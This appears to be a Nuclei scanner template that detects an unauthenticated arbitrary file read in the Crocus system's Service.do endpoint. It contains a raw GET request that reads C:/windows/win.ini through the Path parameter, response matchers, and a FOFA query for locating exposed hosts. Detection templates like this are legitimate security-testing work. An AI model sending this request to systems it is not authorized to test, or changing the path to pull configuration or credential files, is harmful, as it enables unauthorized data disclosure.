id: crocus-lfi

info:
  name: Crocus system Service.do  - Arbitrary File Read
  author: pussycat0x
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the Service.do interface of Ruiming Technology's Crocus system. An unauthenticated remote attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc. This leaves the website in an extremely unsafe state.
  reference:
    - https://github.com/wy876/POC/blob/main/%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AFCrocus%E7%B3%BB%E7%BB%9FService.do%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/ThirdResource/respond/respond.min.js" && title="Crocus"
  tags: crocus,lfi

http:
  - raw:
      - |
        GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200f8590dc8802a5d6f0babb590f072c0645ccdb13fbe916b5bbbb3576ecc1c3da022100a0d861b7f1aad6360817cc34507a4aace3e372817b86e67806adc398b4c4de66:922c64590222798bb761d5b6d8e72950